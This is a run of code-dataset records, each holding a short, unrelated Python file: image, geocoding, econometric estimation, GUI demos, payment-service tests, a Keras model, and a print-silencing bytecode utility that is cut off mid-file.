将图像序列逆转\nsequence.reverse()\n\n#几张单的gif组合成动态图片\n#im.save(out, save_all = True, append_images=[im1, im2......]),这边的im只需要是Image对象即可\nsequence[0].save(r'C:\\工作\\gif动图逆序播放\\动图逆序.gif', save_all=True, append_images=sequence[0:], duration=30)#sequence[0]为Image对象,[1][2]…都可以\n","sub_path":"gif逆序播放.py","file_name":"gif逆序播放.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"134264317","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\nimport reverse_geocoder as rg\nimport sqlite3\n\ntry:\n csvfilename = sys.argv[1]\nexcept IndexError:\n print(\"Usage %s \" % sys.argv[0])\n exit(1)\n\nconn = sqlite3.connect('videos.db')\nc = conn.cursor()\nc.execute(\"CREATE TABLE IF NOT EXISTS videos (longitude float, latitude float, time datetime, id text PRIMARY KEY, country text, state text, city text)\")\n\n# first pass: build database\nwith open(csvfilename, newline='') as csvfile:\n for i, row in enumerate(csv.reader(csvfile)):\n if (i!=0):\n c.execute(\"REPLACE INTO videos (longitude, latitude, time, id) VALUES (?,?,?,?)\", row)\n conn.commit()\n\n# second pass: local geocode\nrows = [row for row in c.execute(\"SELECT latitude,longitude,id FROM videos ORDER BY id\")]\ngeos = rg.search([(row[0], row[1]) for row in rows ])\n\n# third pass: save geocoding\nfor r, row in enumerate(rows):\n g = geos[r]\n if g['admin1'] == 'Washington, D.C.':\n g['admin1'] = \"DC\"\n g['name'] = \"Washington\"\n c.execute(\"UPDATE videos SET country=?, state=?, city=? WHERE id=?\", ( g['cc'], g['admin1'], g['name'], row[2] ))\n conn.commit()\n print(g['cc'], g['admin1'], g['name'], row[2])","sub_path":"geocode.py","file_name":"geocode.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"166096124","text":" \n\"\"\"\nModule estiamates HousingModel using Simualted Method of Moments\nMinimisation performed using Cross-Entropy method (see Kroese et al)\n\nScript must be run using Mpi: \n\nExample (on Gadi):\n\nmodule load python3/3.7.4\nmodule load openmpi/4.0.2\n\nalias mpython='mpiexec -np 480 `which python3`'\n \nmpython SMM.py\n\n\"\"\"\n\n# import packages\n\nimport numpy as np\nimport time\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\n\nfrom collections import defaultdict\nfrom numpy import genfromtxt\nimport csv\nimport time\nimport dill as pickle \nfrom randparam import rand_p_generator\nimport copy\nimport sys\nimport pandas as pd\n\nfrom profiles_moments import genprofiles_operator, gen_moments, sortmoments\nfrom housing_functions import housingmodel_function_factory\nfrom egg_basket import HousingModel, housingmodel_operator_factory\nfrom retiree_operators import housing_model_retiree_func_factory\n\nfrom pyina import mpi\nworld = mpi.world\n\nfrom mpi4py import MPI as MPI4py\ncomm = MPI4py.COMM_WORLD\n\nfrom pyina.mpi_pool import parallel_map\n\nimport gc\n\n\ndef gen_format_moments(TS1,TS2, moments_data):\n\t\"\"\"Gen simulated moments, labels\n\t\tand sorts simulated and data mooments\n\t\tand generates numpy arrays\"\"\"\n\n\tmoments_male \t= gen_moments(copy.copy(TS1),copy.copy(TS2)) \n\tmoments_female \t= gen_moments(copy.copy(TS1),copy.copy(TS2)) \n\tmoments_female \t= moments_female.add_suffix('_female')\n\tmoments_male \t= moments_male.add_suffix('_male')\n\tmoments_sim_sorted \t= sortmoments(moments_male,\\\n\t\t\t\t\t\t\t\t\t\t moments_female)\n\n\tmoments_sim_sorted \t\t= pd.concat([moments_male[\"Age_wave10_male\"]\\\n\t\t\t\t\t\t\t\t.reset_index().iloc[:,1],\\\n\t\t\t\t\t\t\t\tmoments_sim_sorted],\\\n\t\t\t\t\t\t\t\taxis =1) \n\tmoments_sim_sorted \t\t= moments_sim_sorted.rename(columns =\\\n\t\t\t\t\t\t\t {'Age_wave10_male':'Age_wave10'})\n\n\tmoments_data.columns \t= moments_sim_sorted.columns\n\n\t\n\tmoments_sim_sorted =\\\n\t\tmoments_sim_sorted\\\n\t\t.loc[:,moments_sim_sorted.columns.str.endswith('_male')] \n\t\n\tmoments_sim_array = np.array(np.ravel(moments_sim_sorted))\n\n\tmoments_sim_array[np.isnan(moments_sim_array)] = 0\n\n\tmoments_data =\\\n\tmoments_data.loc[:,moments_data.columns.str.endswith('_male')] \n\n\tmoments_data_array = np.array(np.ravel(moments_data))\n\n\treturn moments_sim_array, moments_data_array\n\ndef gen_RMS(parameters,lambdas,\\\n\t\t\tsurvival,\\\n\t\t\tmoments_data,\\\n\t\t\tvol_cont_points,\\\n\t\t\trisk_share_points, TSN,U):\n\t\"\"\"\n\tGenerate root mean square error \n\tbetween simulated moments for HousingModel \n\tand data moments \n\n\t\"\"\"\n\t# define functions \n\n\tfunctions = {}\n\n\tfunctions['u'], functions['uc'], functions['uh'], functions['b'], \\\n\tfunctions['b_prime'], functions['y'],functions['yvec'], functions['DB_benefit'], \\\n\tfunctions['adj_p'], functions['adj_v'], functions['adj_pi'],\\\n\tfunctions['uc_inv'],functions['uh_inv'],\\\n\t\t= housingmodel_function_factory(parameters,\\\n\t\t\t\t\t\t\t\t\t\t lambdas,\\\n\t\t\t\t\t\t\t\t\t\t normalisation)\n\n\t# Create housing model \n\tog = HousingModel(functions, parameters, survival,\\\n\t\t\t\t\t\t\t\t\t\tvol_cont_points,\\\n\t\t\t\t\t\t\t\t\t\trisk_share_points)\n\t\n\t# solve model \n\tgen_R_pol = housing_model_retiree_func_factory(og)\n\n\tsolve_LC_model = housingmodel_operator_factory(og,gen_R_pol)\n\n\tpolicies \t= (solve_LC_model())\n\n\t# generate time series \n\tgenerate_TSDF = genprofiles_operator(og)\n\n\tdel og\n\tgc.collect() \n\n\tTS1, TS2 = generate_TSDF(U,TSN, *policies)\n\n\t# generate and sort moments\n\n\tmoments_sim_array, moments_data_array \\\n\t= gen_format_moments(TS1, TS2, moments_data)\n\n\tdel TS1\n\tdel TS2 \n\tgc.collect()\n\n\tdeviation = (moments_sim_array\\\n\t\t\t\t\t\t\t\t[~np.isnan(moments_data_array)]\\\n\t\t\t\t\t\t\t\t - moments_data_array\\\n\t\t\t\t\t\t\t\t [~np.isnan(moments_data_array)])\n\n\tnorm = np.sum(np.square(moments_data_array[~np.isnan(moments_data_array)]))\n\n\n\n\tN_err = len(deviation)\n\n\treturn 1-np.sqrt((1/N_err)*np.sum(np.square(deviation))/norm)\n\ndef gen_param_moments(parameter_list_dict, param_random_bounds,\\\n\t\t\t\t\t\t selected, weights):\n\n\t\"\"\" Estiamate params of a sampling distribution\n\n\tParameters\n\t----------\n\tparameter_list_dict: Dict\n\t\t\t\t\t\t Dictionary with all paramameters\n\t\t\t\t\t\t with ID keys\n\tselected : 2D-array\n\t\t\t\t\t\t set of elite paramters IDs and errors\n\n\tReturns\n\t-------\n\n\tmeans\n\n\tcov\n\t\"\"\"\n\n\tsample_params = []\n\n\tfor i in range(len(selected)):\n\t\trand_params_i = []\n\t\tfor key in param_random_bounds.keys():\n\t\t\trand_params_i.append(\\\n\t\t\t\tparameter_list_dict[int(selected[i,0])][key])\n\t\t\n\t\tsample_params.append(rand_params_i)\n\n\tsample_params = np.array(sample_params)\n\tmeans = np.average(sample_params, weights = weights, axis=0)\n\tcov = np.cov(sample_params, aweights =weights, rowvar=0)\n\n\treturn means, cov\n\n\nif __name__ == \"__main__\":\n\n\n\n\tnormalisation = np.array([1E-5, 100])\n\tparam_deterministic = {}\n\tparam_random_bounds = {}\n\n\tsettings_folder = '/home/141/as3442/Retirementeggs/settings'\n\n\n\t# un-pack model settings \n\n\twith open('{}/parameters_EGM_base.csv'.format(settings_folder),\\\n\t\tnewline='') as pscfile:\n\t\treader = csv.DictReader(pscfile)\n\t\tfor row in reader:\n\t\t\tparam_deterministic[row['parameter']] = np.float64(row['value'])\n\n\twith open('{}/random_param_bounds.csv'\\\n\t\t.format(settings_folder), newline='') as pscfile:\n\t\treader_ran = csv.DictReader(pscfile)\n\t\tfor row in reader_ran:\n\t\t\tparam_random_bounds[row['parameter']] = np.float64([row['LB'],\\\n\t\t\t\trow['UB']])\n\n\tlambdas = genfromtxt('{}/lambdas_male.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[1:]\n\tsurvival = genfromtxt('{}/survival_probabilities_male.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[0:]\n\tvol_cont_points = genfromtxt('{}/vol_cont_points.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[1:]\n\trisk_share_points = genfromtxt('{}/risk_share_points.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[1:]\n\t\n\n\t# load and prepare data moments \n\tmoments_data = pd.read_csv('{}/moments_data.csv'\\\n\t\t\t\t\t.format(settings_folder))\n\tmoments_data = moments_data.drop('Unnamed: 0', axis=1) \n\n\t# run SMM estimation \n\n\ttol \t= 1E-8\n\tTSN \t= 150\n\tN_elite = 45\n\td \t= 3\n\n\tstart = time.time()\n\t# pick previous parameters settings and means\n\tgamma_XEM \t= pickle.load(open(\"/scratch/pv33/gamma_XEM.smms\",\"rb\"))\n\tS_star \t\t= pickle.load(open(\"/scratch/pv33/S_star.smms\",\"rb\"))\n\tt \t\t\t= pickle.load(open(\"/scratch/pv33/t.smms\",\"rb\"))\n\n\tsampmom \t= pickle.load(open(\"/scratch/pv33/latest_means_iter.smms\",\"rb\"))\n\n\t# generate new parameter sample (each worker generates a random sample)\n\n\tif t ==0:\n\t\tinitial =0\n\telse:\n\t\tinitial = 0\n\n\tparameters = rand_p_generator(param_deterministic,\\\n\t\t\t\t\t\t\t\tparam_random_bounds, deterministic = 0,\\\n\t\t\t\t\t\t\t\tinitial =initial,\\\n\t\t\t\t\t\t\t\tparam_random_means = sampmom[0],\\\n\t\t\t\t\t\t\t\tparam_random_cov = sampmom[1])\n\n\tt = t+1\n\n\tindexed_errors = None\n\tparameter_list = None\n\n\t# eval model on each worker \n\tif world.rank ==0:\n\t\tprint(\"Distributng iter {}\".format(t))\n\t\terrors_ind = [0,0]\n\telse:\n\t\tdef SMM_objective():\n\t\t\t\"\"\"SMM objective to be maximised \n\t\t\tas function of params\"\"\"\n\t\t\tparameters_all = parameters\n\t\t\tU = pickle.load(open(\"/scratch/pv33/seed_U.smms\",\"rb\")) \n\t\t\t#U = np.random.rand(6,100,TSN,100) \n\t\t\tRMS = gen_RMS(parameters_all,lambdas,\\\n\t\t\t\t\t\tsurvival,\\\n\t\t\t\t\t\tmoments_data,\\\n\t\t\t\t\t\tvol_cont_points,\\\n\t\t\t\t\t\trisk_share_points,TSN,U)\n\n\t\t\treturn [parameters_all['ID'], RMS]\n\t\terrors_ind = SMM_objective()\n\t\tdel SMM_objective\n\t\tgc.collect()\n\n\tcomm.Barrier()\n\tindexed_errors \t= comm.gather(errors_ind, root=0)\n\tparameter_list \t= comm.gather(parameters, root=0)\n\n\t# master does calculations\n\t\n\tif world.rank ==0:\n\t\tparameter_list_dict = dict([(param['ID'], param)\\\n\t\t\t\t\t\t\t for param in parameter_list[1:]])\n\t\tindexed_errors_arr = np.array(indexed_errors[1:])\n\t\tindexed_errors_arr = indexed_errors_arr[np.argsort(\\\n\t\t\t\t\t\t\t\t\t-indexed_errors_arr[:,1])]\n\t\tnumber_N \t\t\t\t= len(indexed_errors_arr) - np.sum(np.isnan(indexed_errors_arr[:,1]))\n\n\n\t\telite_errors_indexed = indexed_errors_arr[0: N_elite]\n\n\t\tweights \t\t\t\t= np.exp((elite_errors_indexed[:,1] - np.min(elite_errors_indexed[:,1]))\\\n\t\t\t\t\t\t\t\t\t\t/ (np.max(elite_errors_indexed[:,1]) -np.min(elite_errors_indexed[:,1])))\n\n\n\t\tgamma_XEM = np.append(gamma_XEM,\\\n\t\t\t\t\t\t\t\t\t elite_errors_indexed[-1, 1])\n\t\tS_star = np.append(S_star,\\\n\t\t\t\t\t\t\t\t\t elite_errors_indexed[0, 1])\n\n\t\terror_gamma = gamma_XEM[d +t-1] \\\n\t\t\t\t\t\t\t\t\t- gamma_XEM[d +t -2]\n\t\terror_S = S_star[int(d +t-1)]\\\n\t\t\t\t\t\t\t\t\t- S_star[int(d +t -2)]\n\n\t\tprint(\"...iteration {} on {} cores, elite_gamma error are {} and elite S error are {}\"\\\n\t\t\t.format(t, number_N, error_gamma, error_S))\n\n\t\tconvg = int(np.abs(max(S_star[-d:]) - min(S_star[-d:]))< tol)\n\n\t\tprint(\"...stop_error is {}, convergence is {}\".format(np.abs(max(S_star[-d:]) - min(S_star[-d:])), convg))\n\n\t\tmeans, cov = gen_param_moments(parameter_list_dict,\\\n\t\t\t\t\t\t\t\tparam_random_bounds,\\\n\t\t\t\t\t\t\t\telite_errors_indexed, weights)\n\n\t\tconvg_cov\t\t= int(np.abs(np.max(cov))< tol )\n\t\tprint(\"...cov error is {}, convergence is {}\".format((np.abs(np.max(cov))), convg_cov))\n\n\t\tpickle.dump([means, cov],\\\n\t\t\t\t\t\topen(\"/scratch/pv33/latest_means_iter.smms\",\"wb\"))\n\t\tpickle.dump(gamma_XEM,\\\n\t\t\t\t\t\topen(\"/scratch/pv33/gamma_XEM.smms\",\"wb\"))\n\t\tpickle.dump(S_star,\\\n\t\t\t\t\t\topen(\"/scratch/pv33/S_star.smms\",\"wb\"))\n\n\t\tpickle.dump(t,\\\n\t\t\t\t\t\topen(\"/scratch/pv33/t.smms\",\"wb\"))\n\t\t\n\t\tprint(\"...generated and saved sampling moments\")\n\t\tprint(\"...time elapsed: {} minutes\".format((time.time()-start)/60))\n\n","sub_path":"eggsandbaskets/smm/smm.py","file_name":"smm.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107195588","text":"# Окно с событиями\nfrom tkinter import *\n\n# Функция для события\ndef button1Click() :\n Display.config(text=\"Это радует!\")\ndef button2Click() :\n Display.config(text=\"Это огорчает!\")\n\n# Основная программа\nWindow = Tk()\nDisplay = Label(Window, text=\"Привет, как дела?\")\nDisplay.grid(row=0, column=1)\nButton1 = Button(Window, text=\"Хорошо\", command=button1Click)\nButton2 = Button(Window, text=\"Плохо\", command=button2Click)\nButton1.grid(row=2, column=0, padx=10, pady=10)\nButton2.grid(row=2, column=2, padx=10, pady=10)\nWindow.mainloop()\n\n","sub_path":"python_for_kids/book/Examples/window6.py","file_name":"window6.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68720793","text":"categories = ['brand', 'seats', 'color', 'price']\n\navailable_cars = {\n\t\n\t'impreza' : {\n\t'brand' : 'subaru',\n\t'seats' : 5,\n\t'color' : 'red',\n\t'price' : 40,\n\t},\n\n\t'mustang' : {\n\t'brand' : 'ford',\n\t'seats' : 2,\n\t'color' : 'white',\n\t'price' : 55,\n\t},\n\n\t'sonata' : {\n\t'brand' : 'hyundai',\n\t'seats' : 5,\n\t'color' : 'silver',\n\t'price' : 35,\n\t},\n}\n\n\n\nprompt = \"Welcome to my car rental service.\"\nprompt += \"\\nWhat are you looking for in a car?\"\nprompt += \"\\n\\n- - -\"\nprompt += \"\\n\\nBrand\"\nprompt += \"\\nSeats\"\nprompt += \"\\nColor\"\nprompt += \"\\nPrice\"\nprompt += \"\\n\\nPlease type which of these is your priority: \"\n\npriority = raw_input(prompt).lower()\n\n\nif priority in categories:\n\tprint(\"\\nWe will match you with vehicles that fit with your priorities.\")\n\tprint(\"Your top priority is: \" + priority.title() + \"\\n\")\n\t\n\tif priority == 'color':\n\t\tprint(\"We have cars available in these colors:\")\n\t\tfor car, aspect in available_cars.items():\n\t\t\tprint(\"\\t\" + aspect['color'].title())\n\t\tcolor_choice = raw_input(\"\\nWhich of these colors do you prefer?\\nPlease enter your choice: \").lower()\n\t\tfor car, aspect in available_cars.items():\n\t\t\tif color_choice in aspect['color']:\n\t\t\t\tprint(\"\\nBased on your priorities, we recommend this car:\\n\" + \n\t\t\t\t\taspect['brand'].title() + \" \" + car.title() + \", with the following characteristics:\\n\" + \n\t\t\t\t\t\"Seats: \" + str(aspect['seats']) + \"\\n\" +\n\t\t\t\t\t\"Color: \" + aspect['color'].title() + \"\\n\" +\n\t\t\t\t\t\"Price: $\" + str(aspect['price']) + \" per day\"\n\t\t\t\t\t)\n\t\t\n\tif priority == 'brand':\n\t\tprint(\"We have cars available from these brands:\")\n\t\tfor car, aspect in available_cars.items():\n\t\t\tprint(\"\\t\" + aspect['brand'].title())\n\t\tbrand_choice = raw_input(\"\\nWhich of these brands do you prefer?\\nPlease enter your choice: \").lower()\n\t\tfor car, aspect in available_cars.items():\n\t\t\tif brand_choice in aspect['brand']:\n\t\t\t\tprint(\"\\nBased on your priorities, we recommend this car:\\n\" + \n\t\t\t\t\taspect['brand'].title() + \" \" + car.title() + \", with the following characteristics:\\n\" + \n\t\t\t\t\t\"Seats: \" + str(aspect['seats']) + \"\\n\" +\n\t\t\t\t\t\"Color: \" + aspect['color'].title() + \"\\n\" +\n\t\t\t\t\t\"Price: $\" + str(aspect['price']) + \" per day\"\n\t\t\t\t\t)\n\t\n\tif priority == 'seats':\n\t\tprint(\"We have cars available with these numbers of seats:\")\n\t\tfor car, aspect in available_cars.items():\n\t\t\tprint(\"\\t\" + str(aspect['seats']))\n\t\tseats_choice = raw_input(\"\\nHow many seats do you want to have?\\nPlease enter your choice: \").lower()\n\t\tprint(\"\\nBased on your priorities, there may be a number of a number of car that we recommend:\\n\")\n\t\t# for car, aspect in available_cars.items():\n\t\t# \tif int(seats_choice) in aspect['seats']:\n\t\t\t\t\n\n\n\n\nelse:\n\tprint(\"\\nYour top priority is: \" + priority.title() + \"\\nSorry, your priority does not match with any of our available cars.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23983755","text":"from spinn_utilities.progress_bar import ProgressBar\nfrom .scp_update_runtime_request import SCPUpdateRuntimeRequest\nfrom spinn_front_end_common.utilities.constants import SDP_PORTS\nfrom spinnman.processes import AbstractMultiConnectionProcess\n\n\nclass UpdateRuntimeProcess(AbstractMultiConnectionProcess):\n def __init__(self, connection_selector):\n AbstractMultiConnectionProcess.__init__(self, connection_selector)\n self._progress = None\n\n def receive_response(self, response): # @UnusedVariable\n if self._progress is not None:\n self._progress.update()\n\n def update_runtime(self, run_time, infinite_run, core_subsets, n_cores):\n self._progress = ProgressBar(n_cores, \"Updating run time\")\n for core_subset in core_subsets:\n for processor_id in core_subset.processor_ids:\n self._send_request(\n SCPUpdateRuntimeRequest(\n core_subset.x, core_subset.y, processor_id,\n run_time, infinite_run,\n SDP_PORTS.RUNNING_COMMAND_SDP_PORT.value),\n callback=self.receive_response)\n self._finish()\n self._progress.end()\n self.check_for_error()\n","sub_path":"spinn_front_end_common/utilities/scp/update_runtime_process.py","file_name":"update_runtime_process.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202931919","text":"from face_predictor import *\n\nif __name__ == '__main__':\n\n\timg = 'image.jpg'\n\tres = []\n\n\tfor i, j, tile in img_tiles(img):\n\t\tif face_or_not(tile):\n\t\t\tres.append([i,j])\n\tprint(res)","sub_path":"face_test.py","file_name":"face_test.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"148768705","text":"import re\ndef Str_encode(s:str,rule='utf-8'):\n '''\n 将明文字符串按照rule的格式转化为01字符串\n :param s: 待编码字符串\n :param rule: 编码方案 默认utf-8\n :return: 字符串对应01字符串\n '''\n sc=s.encode(rule)\n bc=[bin(int(i))[2:].rjust(8,'0') for i in sc ]\n rtn=''.join(bc)\n return rtn\n\ndef Str_decode(s:str,rule='utf-8'):\n '''\n 将01字符串(不加任何标识符和纠错码)转化为对应的明文字符串(默认UTF-8)\n :param s:01字符串\n :return:解码原文\n '''\n if len(s)==0:\n return '>>内容为空<<'\n if len(s)%8!=0:\n raise SyntaxError('编码不是八的倍数')\n #至少是字节的倍数才能操作\n msg=re.sub(r'0x','',hex(int(s,2)))\n rtn=bytes.fromhex(msg).decode(rule)\n return rtn\n\nif __name__==\"__main__\":\n print(\"输入要转换的字符串:\")\n message=input()\n bit=Str_encode(message)\n print(bit)\n res = Str_decode(bit)\n print(re)\n","sub_path":"client/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36721943","text":"# In[1]:\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport datetime\r\nfrom sklearn import preprocessing\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.metrics import roc_curve\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier,ExtraTreesClassifier,AdaBoostClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.models import load_model\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.utils import to_categorical\r\n\r\n\r\ndef get_data():\r\n #loading processed data\r\n data = pd.read_pickle(\"music.pickle\")\r\n test = pd.read_pickle(\"test.pickle\")\r\n #Target Generation\r\n target=data['is_listened']\r\n del data['is_listened']\r\n test2=test.iloc[:,1:]\r\n data=pd.concat([data,test2],axis=0)\r\n data=data.fillna(0)\r\n\r\n #dummies creation\r\n dummie1 = pd.get_dummies(data['context_type'], prefix='context_type', prefix_sep='_')\r\n dummie2 = pd.get_dummies(data['platform_name'], prefix='platform_name', prefix_sep='_')\r\n dummie3 = pd.get_dummies(data['platform_family'], prefix='platform_family', prefix_sep='_')\r\n dummie4 = pd.get_dummies(data['listen_type'], prefix='listen_type', prefix_sep='_')\r\n dummie5 = pd.get_dummies(data['user_gender'], prefix='user_gender', prefix_sep='_')\r\n dummie6 = pd.get_dummies(data['genre_id'], prefix='genre_id', prefix_sep='_')\r\n dummie7 = pd.get_dummies(data['album_id'], prefix='album_id', prefix_sep='_')\r\n dummie8 = pd.get_dummies(data['release_date'], prefix='album_id', prefix_sep='_')\r\n dummie9 = pd.get_dummies(data['usergencluster'], prefix='usergencluster', prefix_sep='_')\r\n dummie10 = pd.get_dummies(data['artist_id'], prefix='artist_id', prefix_sep='_')\r\n dummie11 = pd.get_dummies(data['usermedcluster'], prefix='usermedcluster', prefix_sep='_')\r\n dummie12= pd.get_dummies(data['useralbcluster'], prefix='useralbcluster', prefix_sep='_')\r\n dummie13= pd.get_dummies(data['userartcluster'], prefix='userartcluster', prefix_sep='_')\r\n dummie14= pd.get_dummies(data['userdatecluster'], prefix='userdatecluster', prefix_sep='_')\r\n\r\n data=pd.concat([data,dummie1,dummie2,dummie3,dummie4,dummie5,dummie6,dummie7,dummie8,dummie9,dummie10,dummie11,dummie12,dummie13,dummie14],axis=1)\r\n\r\n # Generating normalised features\r\n min_max_scaler = preprocessing.MinMaxScaler(feature_range=(-1, 1))\r\n data['user_age_cent'] = min_max_scaler.fit_transform(data['user_age'])\r\n data['media_duration_cent'] = min_max_scaler.fit_transform(data['media_duration'])\r\n data['Bcent'] = min_max_scaler.fit_transform(data['B'])\r\n data['Ccent'] = min_max_scaler.fit_transform(data['C'])\r\n data['Dcent'] = min_max_scaler.fit_transform(data['D'])\r\n data['Ecent'] = min_max_scaler.fit_transform(data['E'])\r\n data['Fcent'] = min_max_scaler.fit_transform(data['F'])\r\n data['Gcent'] = min_max_scaler.fit_transform(data['G'])\r\n \r\n return data,target\r\n \r\n \r\ndef get_model(n_cols):\r\n# Model\r\n model = Sequential()\r\n model.add(Dense(98 , activation = 'relu' , input_shape = (n_cols,)))\r\n model.add(Dense(98 , activation = 'relu'))\r\n model.add(Dense(56 , activation = 'relu'))\r\n model.add(Dense(56 , activation = 'relu'))\r\n model.add(Dense(56 , activation = 'relu'))\r\n model.add(Dense(42 , activation = 'relu'))\r\n model.add(Dense(14 , activation = 'relu'))\r\n model.add(Dense(2 , activation = 'softmax'))\r\n model.compile(optimizer = 'adam' , loss = 'categorical_crossentropy' , metrics = ['accuracy'])\r\n \r\n return model\r\n \r\ndef prediction(test_data):\r\n # test prediction\r\n preds = model.predict_proba(test_data, verbose=0)[:, 1]\r\n submission = pd.DataFrame(preds, columns=['is_listened'])\r\n submission.to_csv('Keras_21054_b2.csv')\r\n\r\n\r\ndata,target = get_data()\r\n# converting to matrix \r\npredictors = data.iloc[:, 31:633].as_matrix()# assign feature dataframe to predictors removing the target column\r\ntarget1 = to_categorical(target)# assign target dataframe to y\r\nn_cols = predictors.shape[1]\r\npredictors.shape\r\n\r\n# train model\r\nmodel = get_model(n_cols)\r\nearly_stopping_monitor = EarlyStopping(patience = 2)\r\nmodel.fit(predictors[0:7558834,:] , target1 , validation_split = 0.20 , epochs = 2 , callbacks = [early_stopping_monitor])\r\nprediction(predictors[7558834:, :])\r\n\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"153618313","text":"# Copyright © 2019 Province of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests to assure the FeeSchedule Service.\n\nTest-Suite to ensure that the FeeSchedule Service is working as expected.\n\"\"\"\n\nfrom typing import Dict\n\nfrom pay_api.services.payment_account import PaymentAccount as PaymentAccountService\nfrom pay_api.utils.enums import PaymentMethod\n\nfrom tests.utilities.base_test import (\n factory_payment_account, factory_premium_payment_account, get_auth_basic_user, get_auth_premium_user)\n\n\ndef test_account_saved_from_new(session):\n \"\"\"Assert that the payment is saved to the table.\"\"\"\n payment_account = factory_payment_account()\n payment_account.save()\n business_info: Dict = {\n 'businessIdentifier': payment_account.corp_number,\n 'corpType': payment_account.corp_type_code\n }\n\n pa = PaymentAccountService.find_account(business_info, get_auth_basic_user(), 'PAYBC')\n\n assert pa is not None\n assert pa.id is not None\n assert pa.corp_number is not None\n assert pa.corp_type_code is not None\n\n\ndef test_direct_pay_account_saved_from_new(session):\n \"\"\"Assert that the payment is saved to the table.\"\"\"\n payment_account = factory_payment_account(payment_method_code=PaymentMethod.DIRECT_PAY.value)\n payment_account.save()\n business_info: Dict = {\n 'businessIdentifier': payment_account.corp_number,\n 'corpType': payment_account.corp_type_code\n }\n\n pa = PaymentAccountService.find_account(business_info, get_auth_basic_user(), 'PAYBC')\n\n assert pa is not None\n assert pa.id is not None\n assert pa.corp_number is not None\n assert pa.corp_type_code is not None\n\n\ndef test_premium_account_saved_from_new(session):\n \"\"\"Assert that the payment is saved to the table.\"\"\"\n payment_account = factory_premium_payment_account()\n payment_account.save()\n\n pa = PaymentAccountService.find_account({}, get_auth_premium_user(),\n payment_system='BCOL', payment_method=PaymentMethod.DRAWDOWN.value)\n\n assert pa is not None\n assert pa.id is not None\n\n\ndef test_account_invalid_lookup(session):\n \"\"\"Invalid account test.\"\"\"\n business_info: Dict = {\n 'businessIdentifier': '1234',\n 'corpType': 'CP'\n }\n\n p = PaymentAccountService.find_account(business_info, get_auth_basic_user(), 'PAYBC')\n\n assert p is not None\n assert p.id is None\n import pytest\n from pay_api.exceptions import BusinessException\n from pay_api.utils.errors import Error\n with pytest.raises(BusinessException) as excinfo:\n PaymentAccountService.find_account({}, get_auth_basic_user(), 'PAYBC')\n assert excinfo.value.code == Error.INVALID_CORP_OR_FILING_TYPE.name\n\n\ndef test_account_invalid_premium_account_lookup(session):\n \"\"\"Invalid account test.\"\"\"\n business_info: Dict = {\n }\n\n p = PaymentAccountService.find_account(business_info, get_auth_premium_user(), 'BCOL')\n\n assert p is not None\n assert p.id is None\n import pytest\n from pay_api.exceptions import BusinessException\n from pay_api.utils.errors import Error\n with pytest.raises(BusinessException) as excinfo:\n PaymentAccountService.find_account(business_info, {}, 'BCOL')\n assert excinfo.value.code == Error.INCOMPLETE_ACCOUNT_SETUP.name\n","sub_path":"pay-api/tests/unit/services/test_payment_account.py","file_name":"test_payment_account.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"198994363","text":"\"\"\"Shut up *print* statements in Python 2.x\"\"\"\nimport dis\nimport types\n \n \nALL_PRINT = 'PRINT_EXPR', 'PRINT_ITEM', 'PRINT_ITEM_TO', 'PRINT_NEWLINE', 'PRINT_NEWLINE_TO'\nNO_PRINTTO = 'PRINT_EXPR', 'PRINT_ITEM', 'PRINT_NEWLINE'\n \nneed_pop = 'PRINT_EXPR', 'PRINT_ITEM', 'PRINT_NEWLINE_TO'\nneed_2pop = 'PRINT_ITEM_TO',\n \n \nPOP_TOP = chr(dis.opmap['POP_TOP'])\n \n \ndef shutup(fn, print_to=1):\n code = fn.func_code\n code_ops = list(code.co_code)\n new_codestr = []\n print_ops = 